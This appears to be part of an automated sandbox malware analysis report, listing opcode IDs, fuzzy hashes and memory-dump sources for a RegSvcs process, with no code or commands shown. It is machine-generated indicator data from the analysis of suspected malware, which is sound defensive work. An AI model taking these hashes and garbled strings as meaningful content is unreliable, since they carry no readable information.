                                        • API ID:
                                        • String ID: LR^q
                                        • API String ID: 0-2625958711
                                        • Opcode ID: 102668109f6797c5f6b937366af61316d02f21e5911f7d79e66f6ddf2c85c128
                                        • Instruction ID: 583dcb6480a7440e557465de6e6ad8fba9d5840293aa22d01384453189291ff5
                                        • Opcode Fuzzy Hash: 102668109f6797c5f6b937366af61316d02f21e5911f7d79e66f6ddf2c85c128
                                        • Instruction Fuzzy Hash: 1C214536B102098BD7959E394C0122F71D7FBD8314F24846AEA0AEB384EA30EC41C7D6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 013c102922cbd68139d7b7a455905f6fca807b6a12db46609ea9ef862957bc99
                                        • Instruction ID: 95b4d18994e3465c0a5d0d41eac7661c0ff775d2b9431a3c18b4f040be423e2b
                                        • Opcode Fuzzy Hash: 013c102922cbd68139d7b7a455905f6fca807b6a12db46609ea9ef862957bc99
                                        • Instruction Fuzzy Hash: 06012430B062548FEB00CF68DC656AABBB39B8A310F1445AAD009E73D2CA719D00CB50
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a720e32547c41510851eb0d088e4c1bf6a9c45776b021a1d0fc1d7d49537e1d2
                                        • Instruction ID: 5a140d5793adfb7714e91ad86069ca2964c39708f4f224a0277646202c73f69c
                                        • Opcode Fuzzy Hash: a720e32547c41510851eb0d088e4c1bf6a9c45776b021a1d0fc1d7d49537e1d2
                                        • Instruction Fuzzy Hash: 23F10B71B002159FCB04CF6CD98899DBBF6FF8A311B168469E916AB362DB35EC41CB50
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b65cea70ef6816e5650164fdc9bbcd7525ec345279b68abd30d43767f7fce0da
                                        • Instruction ID: 06e38e89eae5c640f0500f804b8f6a40298bdc98a3501313e52d287f0a8a00f4
                                        • Opcode Fuzzy Hash: b65cea70ef6816e5650164fdc9bbcd7525ec345279b68abd30d43767f7fce0da
                                        • Instruction Fuzzy Hash: 5C510575710100CFC716DF38DA95A1A77A6FBD8314B24C5AAE846DB3A4EB70ED02CB90
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f312c9052922b8e0170ae662ba196a15a1a6d583f6d9f2a364e7c35fd3b1d98d
                                        • Instruction ID: 5b389489f91c5aeae9a86e8aef626382410fcf63fd6ad4ed518868e93f901b29
                                        • Opcode Fuzzy Hash: f312c9052922b8e0170ae662ba196a15a1a6d583f6d9f2a364e7c35fd3b1d98d
                                        • Instruction Fuzzy Hash: 5151F475710500CFC716DF38DA94A1A77A6BBD8304B24C5AAE846DB3A4E670ED06CB90
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 156b4d7b14630f96e32db44d5434dab93a409dd57e2307a83bc73d780c642136
                                        • Instruction ID: 01f95e0b30af912e302a3b77d36193947a165220b9dd14af417c9eb5b07e7dde
                                        • Opcode Fuzzy Hash: 156b4d7b14630f96e32db44d5434dab93a409dd57e2307a83bc73d780c642136
                                        • Instruction Fuzzy Hash: 2F31B23270414AAFCF029F65D858AAE7BA2FB89301F048425FD1687384DB78DDA1DBD1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5aff2002a68f020055b8b1f2c2ab69201202801a2e7f5ae75c42bbd5d6cca73b
                                        • Instruction ID: ae0feb888f37bd99f2eb5fc27bc330215d6481b1c02320fd24f984ca2b7d64f2
                                        • Opcode Fuzzy Hash: 5aff2002a68f020055b8b1f2c2ab69201202801a2e7f5ae75c42bbd5d6cca73b
                                        • Instruction Fuzzy Hash: 93316972A093908FD7135F38D8642993F60EF93304F0540DBD8858B297E638DD89C791
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 87d3f4d147ece3136191d31f8c9bfd4138e237073c11004df8915af54a75bd42
                                        • Instruction ID: 668366fbb7c010c71c6df42ce785121c5f3e9247bd61b485a9102fa2ffa51137
                                        • Opcode Fuzzy Hash: 87d3f4d147ece3136191d31f8c9bfd4138e237073c11004df8915af54a75bd42
                                        • Instruction Fuzzy Hash: F42121313042014BDB1A1B25DDA473E36A7BFC4719F1488B9D84ACB394EE69DCC2D781
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e4f4776efca151bb0262ce2654aa2d4674f84343fd7b8b6edc20dca450683980
                                        • Instruction ID: 9093118533621c4dd9f3e6a0ff88661232fcef2096790a69bd75a5c66547a626
                                        • Opcode Fuzzy Hash: e4f4776efca151bb0262ce2654aa2d4674f84343fd7b8b6edc20dca450683980
                                        • Instruction Fuzzy Hash: AC316F71E001059FCB04CF68D8989AEBBF2BFC9310B158969E915AB3A1DB34AD51CB90
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6ad2462e14ecff2c2883f765df3aff9583f0db83299b4f8b93c3435f87a9e335
                                        • Instruction ID: 30ccfdbab456ffbc552f7bbc99c5ce333ca23499d6f59a8637bb11d5ffa15193
                                        • Opcode Fuzzy Hash: 6ad2462e14ecff2c2883f765df3aff9583f0db83299b4f8b93c3435f87a9e335
                                        • Instruction Fuzzy Hash: A52121357142808FCB429FB8D8616597FF2EF8A210B1A84EAE142CF3A6DA35DC098745
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3278365333.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_add000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fffc6f5abcca516d44e396607403581ed576c1edcdb505712c513eb9905207af
                                        • Instruction ID: f42f194ce307dd03d11516159cff79bdf3a0727ba8bd827a57ce409500fd3e47
                                        • Opcode Fuzzy Hash: fffc6f5abcca516d44e396607403581ed576c1edcdb505712c513eb9905207af
                                        • Instruction Fuzzy Hash: 8C2100B1504204DFCB15DF14DAC4B27BF65FB98324F20C5AAE90A0A356C33AE856CAA1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e27871e3f41d6b831650ed2e389178ded0f85211819d7ab9aaf2d6bfedbf19a5
                                        • Instruction ID: fdc78664fcfa14aa6b49d8c8f885c1ff91624f4d82333847053a56d63122c188
                                        • Opcode Fuzzy Hash: e27871e3f41d6b831650ed2e389178ded0f85211819d7ab9aaf2d6bfedbf19a5
                                        • Instruction Fuzzy Hash: 2221C135B101048FCB44DB79D5A5A5EBBF3EFCD210F2480AAE10ADB3A5DA31ED018B51
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0678288474feeef2ff00a6a12f3dda6880a93230224a7dd1cdeb946acbba6345
                                        • Instruction ID: 5d6e169f3840253d7f9555110d2654338a664ae62eaca942a0a8c0dbc009a8ec
                                        • Opcode Fuzzy Hash: 0678288474feeef2ff00a6a12f3dda6880a93230224a7dd1cdeb946acbba6345
                                        • Instruction Fuzzy Hash: C81122367100049FCB44EF78C95495EB7F6EFCD210B2140AAE106DB3A5DE31EC018781
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2d38ded9306bab27d0bbd30950936c29c70ab55d37a446fb0575b8038e24df29
                                        • Instruction ID: 58e7912b29e62b5f2f31ebf68508966b610f827fd1939c8e804bb270d16d4917
                                        • Opcode Fuzzy Hash: 2d38ded9306bab27d0bbd30950936c29c70ab55d37a446fb0575b8038e24df29
                                        • Instruction Fuzzy Hash: 3C2102323052468FCB02AF24D41876E7BA2FB86311F04806AF956CB385DB78DD95CBD1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2c3d33c055ff46137509e5521d872502e746cd40ca5eadc15885b64788b8b525
                                        • Instruction ID: 3bc32fb41161d969c1ca67bc9da600926bd9f8f75d0446ecedef2c892e604052
                                        • Opcode Fuzzy Hash: 2c3d33c055ff46137509e5521d872502e746cd40ca5eadc15885b64788b8b525
                                        • Instruction Fuzzy Hash: AC21C475A012198FDB04DF94C9849DDFBF6FF88310F1486A5E809AB344EB74AD85CB90
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0b4090c04c96334ac9724d1ba88b94c2ad213e2fd1c7428b768f7bb3641addd2
                                        • Instruction ID: 533f28570ee7594ea241c93b67f30101de65361c8dae7dfdffaf1c9d59ac14d9
                                        • Opcode Fuzzy Hash: 0b4090c04c96334ac9724d1ba88b94c2ad213e2fd1c7428b768f7bb3641addd2
                                        • Instruction Fuzzy Hash: A511A370B002058BCB989F7BA92467B7AA6BBC4760F148569E506D7340EA30ED4087D0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3278365333.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_add000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                        • Instruction ID: 656c273b6fea14ddbfa68bb371e0c571f751dc27c7a0454d68914c28ff464cba
                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                        • Instruction Fuzzy Hash: E511B1B6504244CFCB16CF10D9C4B16BF71FB94324F24C5AADC090B656C33AE85ACBA1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a87510db79997e0cd9232a2a5861450b7e0c2fdfd1dc147232590cabba9bca68
                                        • Instruction ID: 01385e5cb9c742892b720f27690f145c05e741a6a4af69bb420446094467259c
                                        • Opcode Fuzzy Hash: a87510db79997e0cd9232a2a5861450b7e0c2fdfd1dc147232590cabba9bca68
                                        • Instruction Fuzzy Hash: AB014732700119AFDF15DE689814AAF3BE7EBC8390F04846EFA15D7240DA75DC029B91
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dfec8951efc480a74cdf4213dad5917af4b332a3a4a20b6c5e5f51b61a57bf3c
                                        • Instruction ID: b74980b8b500d30cd243458f46c55df99510fb163911dd7c68e73f3a08c9bdea
                                        • Opcode Fuzzy Hash: dfec8951efc480a74cdf4213dad5917af4b332a3a4a20b6c5e5f51b61a57bf3c
                                        • Instruction Fuzzy Hash: 400126B2E042149FCB50EF799C146AF7FB1FBA4700F0585AAE884EB311E7719906CB90
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c82613ba4ca2baa7201fc403831097b37b441e72f68dafcfeeb7b03f5b4d3c79
                                        • Instruction ID: 0bdd5a60b11e88618b01262b19fa0e03556ecf105e86ecee6302ad670dd27b09
                                        • Opcode Fuzzy Hash: c82613ba4ca2baa7201fc403831097b37b441e72f68dafcfeeb7b03f5b4d3c79
                                        • Instruction Fuzzy Hash: C511EEB5800349CFDB20DF9AD588BDEBBF4EB48324F20845AD559A7350C379A984CFA5
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0500370b068fda6db1ce388cf605dd05b20abd06b12e03cf2fd4d15b4e40da51
                                        • Instruction ID: 1905940369c91c33914189c72c812d92a9743d6f9f542ca510aefcca84472621
                                        • Opcode Fuzzy Hash: 0500370b068fda6db1ce388cf605dd05b20abd06b12e03cf2fd4d15b4e40da51
                                        • Instruction Fuzzy Hash: 54111EB5800349CFDB11DF99D1847DEFBF0BB48324F20845AC559A7250C338A984CFA5
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 47eeb09caccc2d1ae8d7b748c1832f8d6ae7fb28718ca5a5f84e304500038d29
                                        • Instruction ID: a99ab7128926161782a42322ad68454018140460b9cd9ca6530c7a9959362c10
                                        • Opcode Fuzzy Hash: 47eeb09caccc2d1ae8d7b748c1832f8d6ae7fb28718ca5a5f84e304500038d29
                                        • Instruction Fuzzy Hash: E5F02831E0A2948FCF41DFB8540855EFFF1D3CA210B5442A7C44BCB606DA34C8148B81
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bfae9d02cf1a8ae602f36417d86c514e385eb6a5b9ff70675aba0934c791374b
                                        • Instruction ID: 81180fd9a27af84e64867f6851ca2e119d682e754ce1fb13b69d9d07860775c0
                                        • Opcode Fuzzy Hash: bfae9d02cf1a8ae602f36417d86c514e385eb6a5b9ff70675aba0934c791374b
                                        • Instruction Fuzzy Hash: 47F0E5F2B082029FDB856B73AD241A72A53BBF1391F0A44A2D541D7261FA61E9064360
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9811221c8214ebbb8633eb981968c83918a6c256220496b1b646a4ccf14946a1
                                        • Instruction ID: f73cb45ec4de977f46311b13032f7be1b759d896255c7f5fe29aa8ce5bb51269
                                        • Opcode Fuzzy Hash: 9811221c8214ebbb8633eb981968c83918a6c256220496b1b646a4ccf14946a1
                                        • Instruction Fuzzy Hash: 3EF08C343406009FD324EF79D998F1677A6EB89720F218AA4B6169F3E5CB70EC018750
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1499814ed212e2c13bc7dbee95ddc108bb4adcd7c7933694aba7527cba7aff8a
                                        • Instruction ID: b11a1ed10f2d0f67eeeb2fe837191448c57161b309ec70a991692809e4ca5a0d
                                        • Opcode Fuzzy Hash: 1499814ed212e2c13bc7dbee95ddc108bb4adcd7c7933694aba7527cba7aff8a
                                        • Instruction Fuzzy Hash: EDF0553670A2E04BCB094A7C181445A7FE6C3C725070184ABD48BCB66ACC14CC158384
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: db5397f1812d8387d2cdf87a5ab81a31a0a7e25c7f7ad8ad584ad63720a61e3b
                                        • Instruction ID: fac17e78927b0a2999faaa07bd29ceb6ac81ced6b74f48705fde6b38ec62a526
                                        • Opcode Fuzzy Hash: db5397f1812d8387d2cdf87a5ab81a31a0a7e25c7f7ad8ad584ad63720a61e3b
                                        • Instruction Fuzzy Hash: BEE0223220D3E40FE3039AB8192156B2F368BC7200B0D45EBD68ACF263C110C8258382
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c9b93e4c65aa74ae3b5d612346879803f4007e5b2ecdb2fad6f094b679f37175
                                        • Instruction ID: f7adef8a399ff304f3d337131861675ea1c7dc1676269e55b17ddc2be34a76ff
                                        • Opcode Fuzzy Hash: c9b93e4c65aa74ae3b5d612346879803f4007e5b2ecdb2fad6f094b679f37175
                                        • Instruction Fuzzy Hash: 7DE02C32B0412883CB485EBC290801AB5CFA3DA660B008823A50BC7B0CDE64DC0043D9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 59c7cad8989a62543295c094c281444ddacd4eef0862b46d25b9f16bf71f17b9
                                        • Instruction ID: 1ccf80907a12abb733c6d658847054f85dcedeb913414fc396a989a2758b8e30
                                        • Opcode Fuzzy Hash: 59c7cad8989a62543295c094c281444ddacd4eef0862b46d25b9f16bf71f17b9
                                        • Instruction Fuzzy Hash: 4DE0D831F10D418B8704EBA568A903672D6ABCC20075588B79406DF364DF709D035792
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e47b136fb0583396fb98afb95394bc9449c10c6409d6e38ee38030f630cd4c1a
                                        • Instruction ID: 6f1afdd0c07c9c6d179190d04bf11ab8ab6cb7c0681165d2d88a7ccd0b403b3f
                                        • Opcode Fuzzy Hash: e47b136fb0583396fb98afb95394bc9449c10c6409d6e38ee38030f630cd4c1a
                                        • Instruction Fuzzy Hash: A3D02B3231019947F1465CED5911156714ED7CA660B088463E30ACF304D550DD2142C6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d3a62e69e17e1e61a93d728dd9af4756e295521f460447211a6356f6bfab48d
                                        • Instruction ID: 56b6943f734306e2be0c7059a7517f1669acc4e2ae607d41f819a2d76d90ea89
                                        • Opcode Fuzzy Hash: 3d3a62e69e17e1e61a93d728dd9af4756e295521f460447211a6356f6bfab48d
                                        • Instruction Fuzzy Hash: B7E08670F004404F8344E7A5A9A9026729AABCC20071584769406CF368DF309D034B92
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                        • Instruction ID: 0961f9ac5431cf13f824b866da369b0cf05c2e4dc6898cdb17aa0a672b52360a
                                        • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                        • Instruction Fuzzy Hash: 09C08C3320C1283BA734204E7C80EA3BB8CD3C23F5A210137FA9CC3200A882BC8041F8
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5649589a6ff3c47ae7332b500c500a8941334966454e04365c0b0fb02855851a
                                        • Instruction ID: 8bfdbb03ef778bec4ae11f93e2a864f349457acfa42ac137626f097d861ae16f
                                        • Opcode Fuzzy Hash: 5649589a6ff3c47ae7332b500c500a8941334966454e04365c0b0fb02855851a
                                        • Instruction Fuzzy Hash: 47D0673AB40018EFCB049F99E8408DDF7B6FB98221B148516E915A3261CA319D25DB54
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 607534df58534f516054ac36acf809dd277af08e7d23d33511da55c9672040d6
                                        • Instruction ID: 862852bf29f1ac9ad7f1f440a6eea70397dcf0c8fc8dbd3f1bdeb9a0674257db
                                        • Opcode Fuzzy Hash: 607534df58534f516054ac36acf809dd277af08e7d23d33511da55c9672040d6
                                        • Instruction Fuzzy Hash: C6D0C2B54087829ECF02F731A8A84157F76E982300711D9FAE0460A62BCAB888898F00
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ba78ea5d6167a8de28c19aa8bf1f010968f466b7a343a1f59089a2d1630804b3
                                        • Instruction ID: f76f2bc08ab9a39b4567f4b823156d5f541e49ec26377bcab9f2e96f4e574f89
                                        • Opcode Fuzzy Hash: ba78ea5d6167a8de28c19aa8bf1f010968f466b7a343a1f59089a2d1630804b3
                                        • Instruction Fuzzy Hash: DED01774B106408FC748DFB0E9A981977E8AB88600310C4AA9806CB3B0DB749E01CB50
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8d94fe2575f2353272b1337ffdda4779d563f509c6c0ebf44542445b95385ecb
                                        • Instruction ID: 95ad58b5c4ee94e6c3d81f324151266707be34150e4749130e4d77894ca2384e
                                        • Opcode Fuzzy Hash: 8d94fe2575f2353272b1337ffdda4779d563f509c6c0ebf44542445b95385ecb
                                        • Instruction Fuzzy Hash: 53C02274000A0A5ECE01F320F828424732FE680300700DA30A40A0631ECFB8988D0A80
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$Hbq$$^q$$^q
                                        • API String ID: 0-3400431855
                                        • Opcode ID: 8fb2a7c793b6975a30dfb1d91dcd5943fd33c1612f6f94fa520f306ac4e1a612
                                        • Instruction ID: 2b90c71be96efa791a93a2115c931d95d06a6fd8948b39cfd81a41b0a5f5b786
                                        • Opcode Fuzzy Hash: 8fb2a7c793b6975a30dfb1d91dcd5943fd33c1612f6f94fa520f306ac4e1a612
                                        • Instruction Fuzzy Hash: E651C0307002914BDF19AB7998A853E6AA7BFC27417184869E443CB395EF3CDC0397A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \;^q$\;^q$\;^q$\;^q
                                        • API String ID: 0-3001612457
                                        • Opcode ID: a0ded94ab2332610b240354f28931b9279a0b79daa0fb5efacf69090d001ff7d
                                        • Instruction ID: ce6a37a121e9be8cde0612f9dae08c1abff60a0b5688e489b0a2aa01a51dd3d7
                                        • Opcode Fuzzy Hash: a0ded94ab2332610b240354f28931b9279a0b79daa0fb5efacf69090d001ff7d
                                        • Instruction Fuzzy Hash: 5E019E317104058F8B688E2DC444A2577EABFC8BA031541A9F042CB3E4DB21EC81C7D0